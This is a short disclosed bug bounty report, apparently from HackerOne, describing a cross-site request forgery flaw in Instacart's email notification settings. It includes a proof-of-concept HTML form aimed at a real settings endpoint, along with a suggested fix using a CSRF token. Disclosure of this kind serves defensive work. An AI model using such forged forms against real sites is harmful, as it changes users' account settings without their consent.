CSRF To change Email Notification Settings

Disclosed: 2016-09-15 18:44:14 By trad_zero_h To instacart
Unknown
Vulnerability Details
Hi i found CSRF To change Email Notification Settings The Code Of the HTML Page :: <html> <body> <form action="https://www.instacart.com/api/v2/email_settings/76/disable?resource_token="> <input type="submit" value="Submit form" /> </form> </body> </html> For Fixing you Must add CSEF Token to the Request i attached Video Showing the Bug Thanks
Actions
View on HackerOne
Report Stats
  • Report ID: 157956
  • State: Closed
  • Substate: resolved
  • Upvotes: 8
Share this report